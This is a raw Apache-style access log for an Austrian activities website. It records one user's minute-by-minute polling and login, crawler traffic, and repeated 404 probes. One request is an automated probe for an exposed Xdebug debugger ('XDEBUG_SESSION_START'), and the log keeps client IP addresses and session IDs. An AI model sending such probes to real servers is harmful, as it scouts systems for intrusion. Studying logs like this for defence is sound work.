151.106.163.240 - - [04/Apr/2025:22:16:19 +0200] "GET /download/file.php?id=253&sid=7b7ab058d79a8bd192b7c6aa12dddc8a HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
178.165.172.18 - - [04/Apr/2025:22:16:31 +0200] "GET /entry.php?id=10271&&ser=797731 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=797670" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:16:31 +0200] "GET /gui/javascript/form_form.js?1743797791 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=797731" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:17:31 +0200] "GET /entry.php?id=10271&&ser=797791 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=797731" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:17:31 +0200] "GET /gui/javascript/form_form.js?1743797851 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=797791" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
156.59.198.135 - - [04/Apr/2025:22:17:45 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10253059.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Apr/2025:22:17:54 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10252807.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.172.18 - - [04/Apr/2025:22:18:32 +0200] "GET /entry.php?id=10271&&ser=797851 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=797791" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:18:32 +0200] "GET /gui/javascript/form_form.js?1743797912 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=797851" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:19:32 +0200] "GET /entry.php?id=10271&&ser=797912 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=797851" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:19:32 +0200] "GET /gui/javascript/form_form.js?1743797972 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=797912" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:20:32 +0200] "GET /entry.php?id=10271&&ser=797972 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=797912" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:20:32 +0200] "GET /gui/javascript/form_form.js?1743798032 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=797972" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:21:33 +0200] "GET /entry.php?id=10271&&ser=798032 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=797972" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:21:33 +0200] "GET /gui/javascript/form_form.js?1743798093 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:22:33 +0200] "GET /entry.php?id=10271&&ser=798093 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:22:33 +0200] "GET /gui/javascript/form_form.js?1743798153 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798093" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:23:33 +0200] "GET /entry.php?id=10271&&ser=798153 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798093" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:23:33 +0200] "GET /gui/javascript/form_form.js?1743798213 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798153" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:24:34 +0200] "GET /entry.php?id=10271&&ser=798213 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=798153" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:24:34 +0200] "GET /gui/javascript/form_form.js?1743798274 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798213" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:25:34 +0200] "GET /entry.php?id=10271&&ser=798274 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798213" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:25:34 +0200] "GET /gui/javascript/form_form.js?1743798334 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798274" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
45.148.10.235 - - [04/Apr/2025:22:26:01 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.172.18 - - [04/Apr/2025:22:26:34 +0200] "GET /entry.php?id=10271&&ser=798334 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798274" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:26:34 +0200] "GET /gui/javascript/form_form.js?1743798394 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798334" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:27:35 +0200] "GET /entry.php?id=10271&&ser=798394 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=798334" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:27:35 +0200] "GET /gui/javascript/form_form.js?1743798455 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798394" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:28:35 +0200] "GET /entry.php?id=10271&&ser=798455 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=798394" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:28:35 +0200] "GET /gui/javascript/form_form.js?1743798515 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798455" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
151.106.165.204 - - [04/Apr/2025:22:29:14 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=3&image_id=90&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [04/Apr/2025:22:29:14 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=3&image_id=90&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [04/Apr/2025:22:29:14 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=3&image_id=90&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
178.165.172.18 - - [04/Apr/2025:22:29:35 +0200] "GET /entry.php?id=10271&&ser=798515 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=798455" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:29:35 +0200] "GET /gui/javascript/form_form.js?1743798575 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798515" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:30:36 +0200] "GET /entry.php?id=10271&&ser=798575 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798515" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:30:36 +0200] "GET /gui/javascript/form_form.js?1743798636 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798575" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
151.106.162.214 - - [04/Apr/2025:22:31:02 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a4e4463723a3c5aac28cabb506ba3a0e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [04/Apr/2025:22:31:02 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a4e4463723a3c5aac28cabb506ba3a0e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [04/Apr/2025:22:31:02 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a4e4463723a3c5aac28cabb506ba3a0e HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
178.165.172.18 - - [04/Apr/2025:22:31:36 +0200] "GET /entry.php?id=10271&&ser=798636 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798575" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:31:36 +0200] "GET /gui/javascript/form_form.js?1743798696 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798636" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:32:36 +0200] "GET /entry.php?id=10271&&ser=798696 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798636" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:32:36 +0200] "GET /gui/javascript/form_form.js?1743798756 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798696" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:33:37 +0200] "GET /entry.php?id=10271&&ser=798756 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=798696" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:33:37 +0200] "GET /gui/javascript/form_form.js?1743798817 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798756" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
95.111.240.47 - - [04/Apr/2025:22:33:51 +0200] "GET /login HTTP/1.1" 404 281 "-" "Mozilla/5.0"
178.165.172.18 - - [04/Apr/2025:22:34:37 +0200] "GET /entry.php?id=10271&&ser=798817 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=798756" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:34:37 +0200] "GET /gui/javascript/form_form.js?1743798877 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798817" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
109.205.213.198 - - [04/Apr/2025:22:34:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.172.18 - - [04/Apr/2025:22:35:37 +0200] "GET /entry.php?id=10271&&ser=798877 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798817" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:35:37 +0200] "GET /gui/javascript/form_form.js?1743798937 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798877" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:36:38 +0200] "GET /entry.php?id=10271&&ser=798937 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798877" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:36:38 +0200] "GET /gui/javascript/form_form.js?1743798998 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:37:38 +0200] "GET /entry.php?id=10271&&ser=798998 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798937" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:37:38 +0200] "GET /gui/javascript/form_form.js?1743799058 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=798998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:38:38 +0200] "GET /entry.php?id=10271&&ser=799058 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=798998" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:38:38 +0200] "GET /gui/javascript/form_form.js?1743799118 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=799058" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:39:38 +0200] "GET /entry.php?id=10271&&ser=799118 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=799058" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:39:39 +0200] "GET /gui/javascript/form_form.js?1743799179 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=799118" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:40:39 +0200] "GET /entry.php?id=10271&&ser=799179 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=799118" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:40:39 +0200] "GET /gui/javascript/form_form.js?1743799239 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=799179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:39 +0200] "GET /entry.php?id=10271&&ser=799239 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=799179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:39 +0200] "GET /gui/javascript/form_form.js?1743799299 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=799239" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:54 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1879 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:54 +0200] "GET /gui/javascript/form_form.js?1743799314 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:55 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:55 +0200] "GET /gui/javascript/form_form.js?1743799315 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:55 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1913 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
178.165.172.18 - - [04/Apr/2025:22:41:55 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
151.106.166.60 - - [04/Apr/2025:22:45:16 +0200] "GET /download/file.php?id=251&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.60 - - [04/Apr/2025:22:45:16 +0200] "GET /download/file.php?id=251&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.60 - - [04/Apr/2025:22:45:16 +0200] "GET /download/file.php?id=251&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [04/Apr/2025:22:46:07 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11086230.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [04/Apr/2025:22:46:16 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243362.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Apr/2025:22:46:25 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12210108.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [04/Apr/2025:22:49:40 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
151.106.191.239 - - [04/Apr/2025:22:53:39 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.239 - - [04/Apr/2025:22:53:39 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.239 - - [04/Apr/2025:22:53:39 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [04/Apr/2025:22:55:44 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044942.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Apr/2025:22:55:53 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11581965.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.164.53 - - [04/Apr/2025:22:57:58 +0200] "GET /download/file.php?id=255&sid=f3fec9edac1a87ef3685d7d4e740b119 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [04/Apr/2025:22:57:59 +0200] "GET /download/file.php?id=255&sid=f3fec9edac1a87ef3685d7d4e740b119 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [04/Apr/2025:22:58:43 +0200] "GET /download/file.php?id=254&sid=11a8732ec75b9537fd82dc56ac552843 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [04/Apr/2025:22:58:43 +0200] "GET /download/file.php?id=254&sid=11a8732ec75b9537fd82dc56ac552843 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [04/Apr/2025:22:58:43 +0200] "GET /download/file.php?id=254&sid=11a8732ec75b9537fd82dc56ac552843 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
185.40.4.51 - - [04/Apr/2025:23:02:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [04/Apr/2025:23:02:19 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11818833.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.165.0 - - [04/Apr/2025:23:04:09 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fbf61c710348699c269281f85d38b363 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [04/Apr/2025:23:04:09 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fbf61c710348699c269281f85d38b363 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.0 - - [04/Apr/2025:23:04:09 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=114&sid=fbf61c710348699c269281f85d38b363 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [04/Apr/2025:23:04:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10458567.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [04/Apr/2025:23:05:35 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11504689.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.164.42 - - [04/Apr/2025:23:14:58 +0200] "GET /download/file.php?id=250&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [04/Apr/2025:23:14:58 +0200] "GET /download/file.php?id=250&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [04/Apr/2025:23:14:58 +0200] "GET /download/file.php?id=250&sid=aca3283b7000fad638637dc4318c4d6d HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
115.231.78.11 - - [04/Apr/2025:23:22:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
115.231.78.11 - - [04/Apr/2025:23:22:11 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
115.231.78.11 - - [04/Apr/2025:23:22:11 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
